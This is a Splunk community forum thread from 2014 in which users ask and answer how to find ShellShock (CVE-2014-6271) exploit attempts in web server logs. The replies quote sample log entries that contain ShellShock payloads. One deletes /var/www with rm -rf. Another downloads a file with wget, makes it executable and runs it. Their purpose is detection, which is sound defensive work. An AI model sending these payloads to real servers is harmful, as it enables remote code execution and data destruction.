https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152224#M42668 <P>Some other examples and good discussion: <A href="http://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-logs">http://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-logs</A> </P> <P>Weblog Sample:</P> <PRE><CODE>10.11.12.13 - - [25/Sep/2014:16:00:00 -0400] "GET /cgi-bin/testing.cgi HTTP/1.0" 200 1 "-" "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/rm -rf /var/www/" </CODE></PRE> <P>Unix Log Sample:</P> <PRE><CODE>[Thu Sep 25 16:00:00 2014] [error] [client 10.11.12.13] /bin/rm: cannot remove `/var/www/icons/pie0.png': Permission denied </CODE></PRE> Sun, 05 Oct 2014 20:44:19 GMT mmaier_splunk 2014-10-05T20:44:19Z https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152222#M42666 <P>Let me start by saying I am brand new to Splunk, and not a programmer by profession, but I am surprised that this question has not been discussed. "What query would I run to see if someone has used the ShellShock vulnerability to attack my system?"</P> <P>I think there must be an answer because the blog discussion on how to ensure that all devices are patched for ShellShock starts with the following:<BR /> "I’ll let others tell you how you could use Splunk to search through your various logs for evidence that evildoers are trying to exploit this in your environment."</P> <P>Thanks</P> Sun, 05 Oct 2014 20:18:07 GMT https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152222#M42666 jkhsplunkuser 2014-10-05T20:18:07Z https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152223#M42667 <P>Hi,</P> <P>possible you can review the logs of your web server.</P> <P>search for unix similar expressions like... chmod 777,echo, ls, cd etc.</P> <P>Sample Log:</P> <PRE><CODE>192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh <A href="http://192.168.1.1/filename" target="test_blank">http://192.168.1.1/filename</A>; chmod 777 /tmp/besh; /tmp/besh;" </CODE></PRE> <P>Source: <A href="https://securelist.com/blog/research/66673/bash-cve-2014-6271-vulnerability-qa-2/+">https://securelist.com/blog/research/66673/bash-cve-2014-6271-vulnerability-qa-2/</A> </P> <P>Br<BR /> Matthias</P> Sun, 05 Oct 2014 20:33:30 GMT https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152223#M42667 mmaier_splunk 2014-10-05T20:33:30Z https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152224#M42668 <P>Some other examples and good discussion: <A href="http://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-logs">http://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-logs</A> </P> <P>Weblog Sample:</P> <PRE><CODE>10.11.12.13 - - [25/Sep/2014:16:00:00 -0400] "GET /cgi-bin/testing.cgi HTTP/1.0" 200 1 "-" "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/rm -rf /var/www/" </CODE></PRE> <P>Unix Log Sample:</P> <PRE><CODE>[Thu Sep 25 16:00:00 2014] [error] [client 10.11.12.13] /bin/rm: cannot remove `/var/www/icons/pie0.png': Permission denied </CODE></PRE> Sun, 05 Oct 2014 20:44:19 GMT https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152224#M42668 mmaier_splunk 2014-10-05T20:44:19Z https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152225#M42669 <P><A href="http://blogs.splunk.com/2014/09/24/finding-shellshock-cve-2014-6271-with-splunk-forwarders/">http://blogs.splunk.com/2014/09/24/finding-shellshock-cve-2014-6271-with-splunk-forwarders/</A></P> Mon, 06 Oct 2014 03:06:47 GMT https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152225#M42669 gkanapathy 2014-10-06T03:06:47Z https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152226#M42670 <P>Thanks. The discussion at this link is a big help.</P> Mon, 06 Oct 2014 16:20:22 GMT https://community.splunk.com/t5/Splunk-Search/How-to-use-Splunk-to-detect-ShellShock-exploit-attempts/m-p/152226#M42670 jkhsplunkuser 2014-10-06T16:20:22Z